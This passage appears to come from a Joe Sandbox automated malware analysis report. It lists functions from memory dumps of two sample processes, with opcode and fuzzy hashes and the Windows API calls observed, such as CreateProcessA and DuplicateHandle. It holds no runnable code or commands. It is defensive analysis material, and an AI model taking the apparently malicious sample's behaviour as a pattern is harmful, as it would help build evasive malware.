Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0b1cfcb4324eea63ddaf77606cc5508de603158489e5978e83f36cfd1872e38
Instruction ID: 739e0419b51c94ed75f2b1a73e7b78b5e7af33a6ba6841250eea0491d47fef98
Opcode Fuzzy Hash: d0b1cfcb4324eea63ddaf77606cc5508de603158489e5978e83f36cfd1872e38
Instruction Fuzzy Hash: FDE0123444C3588FD702B7BDF8444953BB3BAC6600715DAA590404A6BEDF75585ECB62

Function 00E88EF7 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccc09a641997dd90366e1a424372f895c5cdedfedc8f708346f3c000f259c187
Instruction ID: 1be059046bbd17af3c0509d7d24547852e36e1fe7ac424d01629bb91dc771dc5
Opcode Fuzzy Hash: ccc09a641997dd90366e1a424372f895c5cdedfedc8f708346f3c000f259c187
Instruction Fuzzy Hash: D3C0123360C0682D9735105D3C819F75B5DC3C13B4A651177FE5CE32009C424C824264

Function 00E8AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a3ffd3b94c99b96734e5d9c56c6a47becbd6455e165890827c39e5e22bcc2e9
Instruction ID: 02c69d8eb24b3be89cde04e374f8a61926de5295cb8f0fbfbe4d45128ccda3c4
Opcode Fuzzy Hash: 5a3ffd3b94c99b96734e5d9c56c6a47becbd6455e165890827c39e5e22bcc2e9
Instruction Fuzzy Hash: DBD0677BB40108AFCB14DF98E840ADDF776FB98221B448516E915A3260C6319965DB60

Function 00E86748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e04dc7d26da3ddd760fdcaf6bf7974f751bb4a4d14d9513cdb075dc3aaa7b80a
Instruction ID: b4f93f0dcc0802cba9c79b1b9e610a83350abd8f394a0f658cfb302568df1958
Opcode Fuzzy Hash: e04dc7d26da3ddd760fdcaf6bf7974f751bb4a4d14d9513cdb075dc3aaa7b80a
Instruction Fuzzy Hash: EAC0123440031C4BDA01F7B9FC45595336AB6C0A04740D930A4050566EEF7569864B92

Function 00E8FFAF Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 036a5f7c2ca66e0e9f2e5526fe79547c27566cd91178ee306a7d705409f2b88b
Instruction ID: 1896ffea8e028ea57f1fa4c3f64b17bc3897e345c81f0fd2591c6663f4e50a56
Opcode Fuzzy Hash: 036a5f7c2ca66e0e9f2e5526fe79547c27566cd91178ee306a7d705409f2b88b
Instruction Fuzzy Hash: F5C0481484E7C52ED743A6A468363DA7E142B12310FA984CED5852F183A686804A87E6

Non-executed Functions

Function 06590040 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3906684361.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6590000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe216aa46c80dfb4c2ea6ac8c38aed44c4062111e92a1df07b4f2e362b36c2a1
Instruction ID: c5c534b8e18a874cae2a73a472c87c41f73128eb614b001206dbc74b13adb47c
Opcode Fuzzy Hash: fe216aa46c80dfb4c2ea6ac8c38aed44c4062111e92a1df07b4f2e362b36c2a1
Instruction Fuzzy Hash: E7529B74E01229CFDB68DF69C884B9DBBB2BB89300F1085EAD409A7354DB359E85CF50

Function 00E8F961 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 829a9438476e6a86867c5882cd7860e757ff00da145c78b970b9757f4a173e7e
Instruction ID: aabc5d9ac34afed231942a3486e798e0fb6510fd40433661491ebedf7397c34d
Opcode Fuzzy Hash: 829a9438476e6a86867c5882cd7860e757ff00da145c78b970b9757f4a173e7e
Instruction Fuzzy Hash: D3C1BF74E01218CFDB54DFA9D944BADBBB2BF89300F2080A9D409AB365DB359E85CF50

Function 0659DE00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3906684361.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6590000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f00333bee81b46dc6adc63c0fccae95eced36f53aa6ca54da1b6017af85e65b3
Instruction ID: ea3286ea3ca097c3d86746be0dbc27019536d0fd863cd8d64d8d18f80cc530cd
Opcode Fuzzy Hash: f00333bee81b46dc6adc63c0fccae95eced36f53aa6ca54da1b6017af85e65b3
Instruction Fuzzy Hash: 3DC1BE74E01218CFDB54DFA9D984BADBBB2BF89300F2081A9D409AB355DB359E85CF50

Function 0659E6B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3906684361.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6590000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea7daeb1b63f63d5281cee2fe0d20410e09343fbce90463dbcc3de445a1794d0
Instruction ID: ad15af190562fbd1f3d10c925f6a448ab470d8d7dbfc278f5e5b43277245fe05
Opcode Fuzzy Hash: ea7daeb1b63f63d5281cee2fe0d20410e09343fbce90463dbcc3de445a1794d0
Instruction Fuzzy Hash: 5CC1BF74E00218CFDB54DFA9D944B9DBBB2BF89300F2081A9D409AB365DB359E85CF50

Function 0659EF60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3906684361.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6590000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d183211acd448d2ac89c14837f1f2bbd087896f1db38ed415cf0d83ca1ee67f
Instruction ID: ecb07d76b1ec5483e0558d70f753a1eec2ff09b918944f9f728ddcc91e74ccda
Opcode Fuzzy Hash: 2d183211acd448d2ac89c14837f1f2bbd087896f1db38ed415cf0d83ca1ee67f
Instruction Fuzzy Hash: EEC1BE74E00218CFDB54DFA9D984BADBBB2BF89300F2080A9D409AB355DB359E85CF50

Function 0659EB08 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3906684361.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6590000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93b811094b0fccfb661e470d6b9dfcfa2e610b4f5d2be3badeb3ff4949662b7e
Instruction ID: 61ce65aedc2bdd0dfe3390ad7ef5562bd985108771bd142a000f0bd0f7f96960
Opcode Fuzzy Hash: 93b811094b0fccfb661e470d6b9dfcfa2e610b4f5d2be3badeb3ff4949662b7e
Instruction Fuzzy Hash: 9FC1AE74E01218CFDB54DFA9D944BADBBB2BF89300F2080A9D419AB355DB359E85CF50

Function 0659F3B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3906684361.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6590000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd7269b90666b4a04252dc51580766df0d5550c44b021a75fc49c1c5955d16f9
Instruction ID: f9de5e9fbc2cd9e6ed489aaa10f528c3a424249e8a018c8e7ea0935a9502207d
Opcode Fuzzy Hash: fd7269b90666b4a04252dc51580766df0d5550c44b021a75fc49c1c5955d16f9
Instruction Fuzzy Hash: 92C1AF74E01218CFDB54DFA9D984B9DBBB2BF89300F2080A9D419AB365DB359E85CF50

Function 0659F810 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3906684361.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6590000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e53983f92466fd8e528e1ec06a739f54db11ac85493dd07da285f81612525c6
Instruction ID: 6ae92354dcc9fac41c153f1cf54b61dc3e78642315337f790c03a30fcf08d5d3
Opcode Fuzzy Hash: 8e53983f92466fd8e528e1ec06a739f54db11ac85493dd07da285f81612525c6
Instruction Fuzzy Hash: 4BC1BF74E00218CFDB54DFA9D954BADBBB2BF89300F2080A9D819AB355DB359E85CF50

Function 0659D0F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3906684361.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6590000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73ff902c60c5f8c2e20ad3fbb19c04942dbc0b024d05968999220ed69438d624
Instruction ID: 09a07ff9fc063dad33eb10da90cca61aa06e4260ade69d2d10ae9bcbb064864b
Opcode Fuzzy Hash: 73ff902c60c5f8c2e20ad3fbb19c04942dbc0b024d05968999220ed69438d624
Instruction Fuzzy Hash: 64C1BF74E01218CFDB54DFA9D984BADBBB2BF89300F2081A9D409AB355DB359E85CF50

Function 0659CCA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3906684361.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6590000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12b4c7e2dbe500dcf528a6c812b916f8dc75121235f77cf2c162b58d6dfdc249
Instruction ID: 3161e11236f85c2b89af37305afb2df0505c7c0b3b2adf88e59c511818a16516
Opcode Fuzzy Hash: 12b4c7e2dbe500dcf528a6c812b916f8dc75121235f77cf2c162b58d6dfdc249
Instruction Fuzzy Hash: 0CC1BE74E01218CFDB54DFA9C994BADBBB2BF89300F2081A9D409AB354DB359E81CF50

Function 0659D550 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3906684361.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6590000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 462b0f09a5cbe4a4aa61f4adcfdc531a08a17411daef29dfe8611d05c953a780
Instruction ID: ebed07310059bdebb131f2684d4bac4727a5027e045aa9f84c1a724470bab7e1
Opcode Fuzzy Hash: 462b0f09a5cbe4a4aa61f4adcfdc531a08a17411daef29dfe8611d05c953a780
Instruction Fuzzy Hash: D9C1BE74E00218CFDB54DFA9C994BADBBB2BF89300F2081A9D409AB355DB359A81CF50

Function 0659D9A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3906684361.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6590000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbfb02fa27a51c33fd5a218f160e08b343358f010fe2efdee315a9a253fa5449
Instruction ID: 363a11d3653c808c0a7003d6a9c5da3ae1b83fd3e579e4b214e249ca8eee6679
Opcode Fuzzy Hash: cbfb02fa27a51c33fd5a218f160e08b343358f010fe2efdee315a9a253fa5449
Instruction Fuzzy Hash: 13C1AE74E01218CFDB54DFA9D984BADBBB2BF89300F2081A9D409AB355DB359E85CF50

Function 00F86999 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3891153695.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8ff91deb5ed9114d5d18d762bda657b8f3d2e97a7d6f3bfd74f0c670655d77c
Instruction ID: 7c1a71cf66a86f6807ef4064745363fed9d2621aad3390a2814d41814d491d11
Opcode Fuzzy Hash: c8ff91deb5ed9114d5d18d762bda657b8f3d2e97a7d6f3bfd74f0c670655d77c
Instruction Fuzzy Hash: 61A1D578A00329CFDB65EF64D854BAAB7B2FB88300F5081E9D80A67395DB355E81DF50

Function 00F85434 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3891153695.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc5ca47e4cad96e9aa58aa97969b0a8077dfbd04cceb818f2b1cb95430d0cab9
Instruction ID: 0a6949541ef2c7c3079b277a47457929881ac9902e81150c8eec9264aeeed94e
Opcode Fuzzy Hash: bc5ca47e4cad96e9aa58aa97969b0a8077dfbd04cceb818f2b1cb95430d0cab9
Instruction Fuzzy Hash: 2C91D338A00269CFEB25EF64D854BADB7B2FB88700F5085DAD80A67394CB355E81DF50

Function 00F87F17 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3891153695.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9964f67987482b7d22057a24015cf8654a2ee40adeadb5e366c21d0890b5ca2b
Instruction ID: 26064cc5903a90e2bbb3c62f40675f3f83e7699ba24da1ec1c096d534a13eaf9
Opcode Fuzzy Hash: 9964f67987482b7d22057a24015cf8654a2ee40adeadb5e366c21d0890b5ca2b
Instruction Fuzzy Hash: 5191D738A0022ACFEB65EF64D854BA9B7B2FB88704F5081E9D40967394CB355EC1DF51

Function 06590673 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3906684361.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6590000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a851872919c4ad7ecd38ac46b8bb8c4398664f810e2a6a690603be4045ad8e35
Instruction ID: 53001d218ed918fc31f52fa1fcca2a88158a9deeb38e348426dad4269e580b86
Opcode Fuzzy Hash: a851872919c4ad7ecd38ac46b8bb8c4398664f810e2a6a690603be4045ad8e35
Instruction Fuzzy Hash: 53A17E74A01228CFDB69DF64C854B9ABBB2BF89301F1089EAD50DA7350DB359E81CF51

Function 00E8F2C0 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5479cb81a4da10d3a318ecee5447dd64988590447bd20e4e31db1e82a8b36b6a
Instruction ID: 80aa282da41a89d9b51640d758edbccb2ba70b6e5d326a9fa97cbab998657941
Opcode Fuzzy Hash: 5479cb81a4da10d3a318ecee5447dd64988590447bd20e4e31db1e82a8b36b6a
Instruction Fuzzy Hash: B3512570D01208CFDB14EFA9D5847EEBBB2FF89301F24A169D418BB294DB759885CB64

Function 00E8F4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0603fb6a099162e6eb0bde20da6e2b843957c1040535eb321ce197b12800220c
Instruction ID: 8eb32cd692d9f2c211195e742e706c864773785b05b1eda502a690a4d498bd86
Opcode Fuzzy Hash: 0603fb6a099162e6eb0bde20da6e2b843957c1040535eb321ce197b12800220c
Instruction Fuzzy Hash: E451EF70D05208CFDB14EFA8D584BAEBBB1FB49305F20A12AE41DBB295C7759881CB54

Function 06590853 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3906684361.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6590000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8234a37ef3d87cd52ade529ec216e2973d922f8e055bcc138f0c13f7da01d1b7
Instruction ID: f40d8beb57eb4ca2d4d820f7b531574126aba8e1c2e6b5a4f86c564e0b41b1ae
Opcode Fuzzy Hash: 8234a37ef3d87cd52ade529ec216e2973d922f8e055bcc138f0c13f7da01d1b7
Instruction Fuzzy Hash: 4D51A374A01229CFDB69DF24D854BAAB7B2FF4A301F5089E9D509A7350DB319E81CF50

Analysis Process: qggKEJlcsFa.exePID: 7864, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	12.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	297
Total number of Limit Nodes:	14

Executed Functions

Function 06D42E90 Relevance: .9, Instructions: 890COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e62dfebb0eb1bcfe8545fd1d8f9f2636098365cdbd32f9e323cf3bc0800fb39
Instruction ID: 1b33ccde605850b3c742d3f8e29c9ed54a79f549105df3c66e31e8efe0ebdaf9
Opcode Fuzzy Hash: 1e62dfebb0eb1bcfe8545fd1d8f9f2636098365cdbd32f9e323cf3bc0800fb39
Instruction Fuzzy Hash: B0726070A002199FDB54EFAAD894AAEBBF6BF88300F158459E445EB391DB31DD41CB90

Function 06D46108 Relevance: .9, Instructions: 885COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b94ef9af629131e88402933728bc3c230f30635da57fd963fea50170749574cb
Instruction ID: e17a0398e417c3df5613474947bf507b4488a855c1f2e1b9e3828eabd4194e7e
Opcode Fuzzy Hash: b94ef9af629131e88402933728bc3c230f30635da57fd963fea50170749574cb
Instruction Fuzzy Hash: C3828F70A00659DFCB55DFA8C984AAEBBF2FF49300F158569E406AB3A1D730ED41CB91

Function 0298AD48 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0298AF9E

Strings

dQ, xrefs: 0298AED6
dQ, xrefs: 0298AEFB

Memory Dump Source

Source File: 00000008.00000002.1471998872.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2980000_qggKEJlcsFa.jbxd

Similarity

API ID: HandleModule
String ID: dQ$dQ
API String ID: 4139908857-2175404480
Opcode ID: 340c105d9349afa11a37e5625ba7d4c45876b87f712b0351b75adeb322bef732
Instruction ID: 1b12a0e8975252c3b73330d1d952f40d37882b10d3c9bb8242f47bdc170f0c37
Opcode Fuzzy Hash: 340c105d9349afa11a37e5625ba7d4c45876b87f712b0351b75adeb322bef732
Instruction Fuzzy Hash: 9F714671A00B058FD724EF29D44475ABBF5FF88304F04892ED48AD7A51EB79E845CB91

Function 085B6954 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 085B6B96

Memory Dump Source

Source File: 00000008.00000002.1475818318.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_85b0000_qggKEJlcsFa.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 86a5174088c8f9fa959b897042232a89f6ea5d51fb7c3702635ef06945b7264a
Instruction ID: 2a039658d1b60f4815052ddc0942854bc3124283f1651a9535f6752ce00d56d3
Opcode Fuzzy Hash: 86a5174088c8f9fa959b897042232a89f6ea5d51fb7c3702635ef06945b7264a
Instruction Fuzzy Hash: 33912571D00219DFEF24DFA8C841BEEBBF2FB59311F1485A9D808A7280DB759985CB91

Function 085B6960 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 085B6B96

Memory Dump Source

Source File: 00000008.00000002.1475818318.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_85b0000_qggKEJlcsFa.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 350468beac9d22638478522c2f0a5ba7533d53ab82b9cd472fd957e24bcfa97b
Instruction ID: e8d0ad82065d832b7f17132683820bb466cb84f21102ed38eed148822938ebf9
Opcode Fuzzy Hash: 350468beac9d22638478522c2f0a5ba7533d53ab82b9cd472fd957e24bcfa97b
Instruction Fuzzy Hash: A3911571D00219DFEF24DFA8C841BEEBBF2BB59311F1485A9D808A7280DB759985CB91

Function 050A18E4 Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 050A1A02

Memory Dump Source

Source File: 00000008.00000002.1474342395.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_50a0000_qggKEJlcsFa.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 77db047fa5fc539903b21e9f1c289014787d098845d6ce2bd73c3731f46b1adb
Instruction ID: 380baaff7b01751c3caaedcdadb057465d243ea9dde40cf067e3b202cbd7884d
Opcode Fuzzy Hash: 77db047fa5fc539903b21e9f1c289014787d098845d6ce2bd73c3731f46b1adb
Instruction Fuzzy Hash: 7A51DFB1D04349DFDB14CFA9D884ADEBBF5BF88310F24812AE819AB250D7759845CF90

Function 050A18F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 050A1A02

Memory Dump Source

Source File: 00000008.00000002.1474342395.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_50a0000_qggKEJlcsFa.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: faa17c85d1c273e43df4afa0f30d42c9fd11edb8af008ba08f59b895c51eb7a8
Instruction ID: 83155c236b7a94a2a691de4917b46007c62310319a62c8699cc08488d8224a64
Opcode Fuzzy Hash: faa17c85d1c273e43df4afa0f30d42c9fd11edb8af008ba08f59b895c51eb7a8
Instruction Fuzzy Hash: AF41BEB1D10349DFDB14CFAAD884ADEBBF5BF48310F24812AE819AB210D775A945CF90

Function 029844E4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 029859C9

Memory Dump Source

Source File: 00000008.00000002.1471998872.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2980000_qggKEJlcsFa.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 354e8180537f1714a48a99cc9241a496e36af3385f215542f1b0ca975eff33a1
Instruction ID: abf3ae653b6da6c79698b97fe7eb57ff948866f8922a3eb90b9acfddabe0427d
Opcode Fuzzy Hash: 354e8180537f1714a48a99cc9241a496e36af3385f215542f1b0ca975eff33a1
Instruction Fuzzy Hash: C941D070C00719CBEB24DFA9C884B9EBBF5BF49304F65806AD408AB251DB75694ACF90

Function 050A4050 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 050A4111

Memory Dump Source

Source File: 00000008.00000002.1474342395.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_50a0000_qggKEJlcsFa.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: bb28656d9003b03f4a9a84fe809e55c36607e26c7cb37d23cc23e7b002bf40a1
Instruction ID: e21f1ed71e3da3999b4a8840c6d1c766d1534238d04b6d4f972dd189dbf6b806
Opcode Fuzzy Hash: bb28656d9003b03f4a9a84fe809e55c36607e26c7cb37d23cc23e7b002bf40a1
Instruction Fuzzy Hash: B24117B9900209DFDB14CF99D488AAEBBF6FB88314F248459D519AB321D375A841CFA1

Function 0298590D Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 029859C9

Memory Dump Source

Source File: 00000008.00000002.1471998872.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2980000_qggKEJlcsFa.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8d3a2390c438b11df22094fbf0a885d02793e3d8d55b8c20a0790a9019125990
Instruction ID: 1d589058feeae54d0d691a880a8b298ed52d1f33a03a74b65458c9f99cce1abc
Opcode Fuzzy Hash: 8d3a2390c438b11df22094fbf0a885d02793e3d8d55b8c20a0790a9019125990
Instruction Fuzzy Hash: E241F270C04759CFEB24DFA9C884B8DBBF1BF45304F65809AC448AB291DB75694ACF50

Function 0298D6E1 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0298D5E6,?,?,?,?,?), ref: 0298D6A7

Memory Dump Source

Source File: 00000008.00000002.1471998872.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2980000_qggKEJlcsFa.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c37b0b4f8ea6695c1aebe04e0c1c21f6924df75018aee3d9fae0d7cc7f25d7ef
Instruction ID: 8a85a759d05fbf34e690de2fa78d1e2e1fa6f52413594d703dc8f4cd051abc30
Opcode Fuzzy Hash: c37b0b4f8ea6695c1aebe04e0c1c21f6924df75018aee3d9fae0d7cc7f25d7ef
